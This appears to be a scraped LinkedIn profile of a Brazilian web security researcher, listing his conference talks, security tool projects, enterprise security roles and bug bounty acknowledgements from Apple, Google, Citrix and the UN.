«I had the honor and pleasure of having Ricardo in the organization that I recently led for four years. He is an incredible person, both professionally and personally. Ricardo is incredibly knowledgeable about cybersecurity, but always accessible and always willing to help. He uses his skills to best serve his colleagues and his enterprise - and these skills cover red teaming, cloud security, exploit tool knowledge, tool creation, you name it. I am so glad I had the opportunity to watch Ricardo at work, and he's a true asset to anyone he works with.»
Acerca de
With extensive experience in web application security testing, the security development…
Experiencia y educación
-
HP
Mira la experiencia completa de Ricardo
Mira su cargo, antigüedad y más
o
Licencias y certificaciones
-
-
-
MCSO - Modulo Certified Security Officer
Módulo Security Solutions
Expedición: Vencimiento:ID de la credencial MCSO 1.120/10 -
Experiencia de voluntariado
-
HP Global Social Innovation
HP
- 1 año 1 mes
Derechos civiles y acción social
Hewlett Packard (HP) and Junior Achievement – Young Enterprise Europe (JA-YE Europe) have launched a new enterprise education program to encourage more young people around the world to become social innovators.
In the pilot year, over 14,000 students in 13 countries (Brazil, Bulgaria, China, Egypt, , India, Kenya, Romania, Russia, Slovakia, South Africa, United Kingdom and USA) will be challenged to tackle some of society’s biggest challenges in an online ‘Social Innovation Relay’ and…Hewlett Packard (HP) and Junior Achievement – Young Enterprise Europe (JA-YE Europe) have launched a new enterprise education program to encourage more young people around the world to become social innovators.
In the pilot year, over 14,000 students in 13 countries (Brazil, Bulgaria, China, Egypt, , India, Kenya, Romania, Russia, Slovakia, South Africa, United Kingdom and USA) will be challenged to tackle some of society’s biggest challenges in an online ‘Social Innovation Relay’ and a total of 55,000 students will participate in educational activities related to the relay.
Facebook page: https://www.facebook.com/SocialInnovationRelay. -
HP Global Volunteer Challenge
HP
- 3 años 1 mes
Infancia
Trying to make the life better for 44 childrens from "Centro Educacional Catarina Kentenich" who were assaulted or taken from home because of drugs.
Publicaciones
-
OWASP Secure Headers Project (Mind The Sec 2016)
http://mindthesec.com.br/ricardo-iramar-dos-santos
Ver publicaciónHTTP headers are well known and also despised. Seeking the balance between usability and security developers implement functionality through the headers that can make your more versatile or secure application. But in practice how the headers are being implemented? What sites follow the best implementation practices? Big companies, small, all or none?
OWASP Secure Headers Project involves setting headers from the server is easy and often doesn't require any code changes. Once set, they can…HTTP headers are well known and also despised. Seeking the balance between usability and security developers implement functionality through the headers that can make your more versatile or secure application. But in practice how the headers are being implemented? What sites follow the best implementation practices? Big companies, small, all or none?
OWASP Secure Headers Project involves setting headers from the server is easy and often doesn't require any code changes. Once set, they can restrict modern browsers from running into easily preventable vulnerabilities. OWASP Secure Headers Project intends to raise awareness and use of these headers.
We aim to publish reports on header usage stats, developments and changes. Code libraries that make these headers easily accessible to developers on a range of platforms. Data sets concerning the general usage of these headers.
Slides: https://drive.google.com/file/d/0B_hCIsQuJ1irRE5kZW9mbzBvOGs/view?usp=sharing -
Validating Certificates and Public Key Pinning (BSidesSP 12)
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_12/Palestras#Validating_Certificates_and_Public_Key_Pinning
Ver publicaciónIn 2012 the paper "The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software" made it clear how many mobile applications were vulnerable to man-in-the-middle attack. Today with the evolution of IoT this problem becomes even more dangerous. This talk give you the concepts about certificate validation (client side) and Public Key Pinning.
Slides: https://docs.google.com/presentation/d/1GODt8n4pV44KC5wMGlJIROWKZLODgE650Kfsgb7vZGY/present -
HTTP Headers. A hidden world. (SECOMP Unicamp 2015)
http://www.secomp.com.br/palestras
Ver publicaciónHTTP headers are well known and also despised. Seeking the balance between usability and security developers implement functionality through the headers that can make your more versatile or secure application. But in practice how the headers are being implemented? What sites follow the best implementation practices? Big companies, small, all or none?
Slides: https://prezi.com/m9suylkg1_n2/http-headers/ -
HTTP Headers. A hidden world. (BSidesSP 11)
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/Palestras#HTTP_Headers._A_hidden_world
Ver publicaciónHTTP headers are well known and also despised. Seeking the balance between usability and security developers implement functionality through the headers that can make your more versatile or secure application. But in practice how the headers are being implemented? What sites follow the best implementation practices? Big companies, small, all or none?
Slides: https://prezi.com/hkganvlwdspx/http-headers-v0/ -
HTTP Headers. A hidden world. (CryptoRave 2015)
https://cryptorave.org/#programacao
Ver publicaciónHTTP headers are well known and also despised. Seeking the balance between usability and security developers implement functionality through the headers that can make your more versatile or secure application. But in practice how the headers are being implemented? What sites follow the best implementation practices? Big companies, small, all or none?
Slides: https://prezi.com/hkganvlwdspx/http-headers-v0/ -
XSS more than a simple alert("XSS") (BSidesSP 10)
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_10/Palestras#XSS_more_than_a_simple_alert.28.22XSS.22.29
Ver publicaciónUsually a XSS (Cross Site Scripting) is demonstrated running a simple javascript "alert box" which does not show the real impact that can be caused. This talk will show you what the real impact that a XSS can cause and how to prevent it.
Slides: https://docs.google.com/presentation/d/1hV7rANhwTVxKRGP487hGJRgZ-1TySGSh6N_DpE5NFzM/present -
The man-in-the-middle attack (BSidesSP 8)
https://www.garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_8/Palestras#The_man-in-the-middle_attack
Ver publicaciónThe man-in-the-middle attack is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.
Slides: http://slides.com/riramar/mitm -
Basic cryptography (BSidesSP 4)
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_4/Basic_Cryptography
Ver publicaciónAn overview about basic cryptography.
Slides: http://ricardo-iramar.com.br/docs/Basic%20Cryptography.pptx
Video: http://www.youtube.com/watch?v=hNadQku3AO0 -
Slackware Zine Ed. 4
http://www.slackzine.com.br
Ver publicaciónInstalling Slackware through NFS or FTP.
Proyectos
-
SmuggleTP
A straightforward tool for exploiting SMTP Smuggling vulnerabilities.
-
HueBR Challenge 01
-
Ver proyectoThis is my first web challenge called "HueBR Challenge 01". Can you get the flag.html?
-
h2csmuggler-proxy
-
Ver proyectoh2cSmuggler smuggles HTTP traffic past insecure edge-server proxy_ configurations by establishing HTTP/2 cleartext (h2c) communications with h2c-compatible back-end servers, allowing a by of proxy rules and access controls.
This script just implement a proxy over h2cSmuggler so you can navigate in your browser making requests to the back-end server. -
OWASP Top 10 2017
-
Just small contributions on OWASP Top 10 2017 A6 - Security Misconfiguration with OWASP Secure Headers Project and some other stuff.
Otros creadores -
-
OWASP Android Public Key Pinning Example
-
Just another example for Android Public Key Pinning.
Reference: https://www.owasp.org/index.php?title=Certificate_and_Public_Key_Pinning&oldid=216156#Android.Otros creadores -
-
HP Commercial Cloud Platform
-
Secure Product Development Lifecycle.
-
HP SILAS: Security Intelligence-as-a-Service
-
SILAS aims at providing key decision makers within organisations with strategic metrics, predictions and “what- if” analysis (leveraging HP Security Analytics) for risk assessment, scenario planning and decision .
SILAS uses information provided by current SIM/SEM solutions (e.g. HP ArcSight), threat intelligence services (e.g. HP DV Labs and HP TippingPoint/TreatLinq) and other logging systems to ground the statistical estimation of risk metrics and to provide input parameters to HP…SILAS aims at providing key decision makers within organisations with strategic metrics, predictions and “what- if” analysis (leveraging HP Security Analytics) for risk assessment, scenario planning and decision .
SILAS uses information provided by current SIM/SEM solutions (e.g. HP ArcSight), threat intelligence services (e.g. HP DV Labs and HP TippingPoint/TreatLinq) and other logging systems to ground the statistical estimation of risk metrics and to provide input parameters to HP Security Analytics’ predictive metrics and simulations.Otros creadores -
-
Data Loss Prevention (DLP)
-
Deployment of a enterprise wide data loss prevention solution focused on the corporate e-mail system and s workstations.
Otros creadores -
-
Information Rights Management
-
Security tool to provide granular access control over documents used from different teams.
Otros creadores -
-
Active Directory and Exchange Security Tool
-
We deployed a security tool to provide separation of duties and audits logs of the Microsoft Active Directory and Microsoft exchange to our operational team.
Otros creadores -
-
RANGE
-
RANGE (Remote Access Next Generation) project implementation in Latin America using SSL VPNs Juniper Networks Secure Access 4000 solution.
Otros creadores -
-
ENROLL
-
Global identity and access management processes and services implementation. Data consolidation and training for more than 150 people in a specific role.
Otros creadores -
-
BOVESPA
-
Management and istration of BOVESPA (Bolsa de Valores de Sao Paulo) Firewall environment (CheckPoint Appliances) and network devices (Cisco).
Otros creadores -
-
VPN IPSEC
-
Management and istration of Ford VPN environment (Juniper Appliances) and network devices (Cisco).
Otros creadores -
Reconocimientos y premios
-
CVE-2023-22247 - Blind XPath Injection
https://helpx.adobe.com/security/products/magento/apsb23-17.html
Vulnerability Category: XML Injection (aka Blind XPath Injection) (CWE-91)
Vulnerability Impact: Arbitrary file system read
Severity: Critical
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N -
Google Hall of Fame
https://www.google.com/about/appsecurity/hall-of-fame/archive/
Found an interesting issue similar to Subdomain Takeover and got a low bounty reward.
-
Apple Security Bounty
https://.apple.com/en-us/HT201536
2021-03-04 wfo-mdn.apple.com
A server configuration issue was addressed. We would like to acknowledge Ricardo Iramar dos Santos (linkedin.com/in/iramar/) for reporting this issue. -
United Nations Information Security Hall of Fame
https://unite.un.org/content/hall-fame
Reported broken authentication vulnerability on un.org.
29 March 2021 -
Apple Security Bounty
https://.apple.com/en-us/HT201536
2021-02-08 sscontent.apple.com
A server configuration issue was addressed. We would like to acknowledge Ricardo Iramar dos Santos (linkedin.com/in/iramar/) for reporting this issue. -
Top 10 web hacking techniques of 2020 nomination - The Powerful HTTP Request Smuggling 💪
https://portswigger.net/research/top-10-web-hacking-techniques-of-2020-nominations-open
2020 was not an ideal year for many of us, but that didn't stop the security community from sharing a broad array of novel research ranging from creative iterations on existing work to entire new attack concepts. Keeping up with this flood of posts can be exhausting in the best of times, so every year we collaborate with the community to first identify all the key research releases, then whittle the list down to the top ten must-see new…
2020 was not an ideal year for many of us, but that didn't stop the security community from sharing a broad array of novel research ranging from creative iterations on existing work to entire new attack concepts. Keeping up with this flood of posts can be exhausting in the best of times, so every year we collaborate with the community to first identify all the key research releases, then whittle the list down to the top ten must-see new techniques.
https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142 -
Apple Security Bounty
https://.apple.com/en-us/HT201536
2020-12-03 ecommerce.apple.com
A server configuration issue was addressed. We would like to acknowledge Ricardo Iramar dos Santos (linkedin.com/in/iramar/) for reporting this issue. -
Apple Security Bounty
https://.apple.com/en-us/HT201536
2020-11-26 apple.com
A server configuration issue was addressed. We would like to acknowledge Ricardo Iramar dos Santos (linkedin.com/in/iramar/) for reporting this issue. -
Citrix Hall of Fame (HTTP Request Smuggling attacks on Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP)
Citrix
Security enhancements to help protect customers against HTTP Request Smuggling attacks have been added to Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP.
References:
- https://.citrix.com/article/CTX281474
- https://.citrix.com/article/CTX282268
- https://www.citrix.com/about/trust-center/vulnerability-process.htm (Hall of Fame) -
Apple Security Bounty
https://.apple.com/en-us/HT201536
2020-08-21 usaus1-labclient-vpn3.apple.com
A server configuration issue was addressed. -
Most Valuable Hacker (Third Place) on Hacking Meetup Mercado Livre Brasil 2020
Mercado Livre
-
Global CyberLympics World 2019 Finalist
EC-Council Foundation
Global CyberLympics is an international online cyber security competition, dedicated to finding the top computer network defense teams. This event tests the skills of information assurance professionals in teams of 4 to 6 people in the areas of ethical hacking, computer network defense and computer forensics. Each round serves as an elimination round until only winning teams remain. The top winning teams from every continent get invited to play the game live in person at the world…
Global CyberLympics is an international online cyber security competition, dedicated to finding the top computer network defense teams. This event tests the skills of information assurance professionals in teams of 4 to 6 people in the areas of ethical hacking, computer network defense and computer forensics. Each round serves as an elimination round until only winning teams remain. The top winning teams from every continent get invited to play the game live in person at the world finals.
Global CyberLympics aspires to create an opportunity for ethical hacking to be accepted, practiced and demonstrated without any discrimination, across all geographical boundaries – for the purpose of understanding what it takes to protect and secure critical information and assets. One key initiative for Global CyberLympics is to foster an environment that creates child online protection through education. -
Global CyberLympics World 2018 Finalist
EC-Council Foundation
Global CyberLympics is an international online cyber security competition, dedicated to finding the top computer network defense teams. This event tests the skills of information assurance professionals in teams of 4 to 6 people in the areas of ethical hacking, computer network defense and computer forensics. Each round serves as an elimination round until only winning teams remain. The top winning teams from every continent get invited to play the game live in person at the world…
Global CyberLympics is an international online cyber security competition, dedicated to finding the top computer network defense teams. This event tests the skills of information assurance professionals in teams of 4 to 6 people in the areas of ethical hacking, computer network defense and computer forensics. Each round serves as an elimination round until only winning teams remain. The top winning teams from every continent get invited to play the game live in person at the world finals.
Global CyberLympics aspires to create an opportunity for ethical hacking to be accepted, practiced and demonstrated without any discrimination, across all geographical boundaries – for the purpose of understanding what it takes to protect and secure critical information and assets. One key initiative for Global CyberLympics is to foster an environment that creates child online protection through education. -
Best student of electrical engineering
CREA (Conselho Regional Engenharia Arquitetura)
Graduate by CREA for highest honors for best student of electrical engineering in 2002.
Idiomas
-
English
Competencia profesional completa
-
Spanish
Competencia básica
-
Portuguese
Competencia bilingüe o nativa
Recomendaciones recibidas
-
de LinkedIn
29 personas han recomendado a Ricardo
Unirse para verlo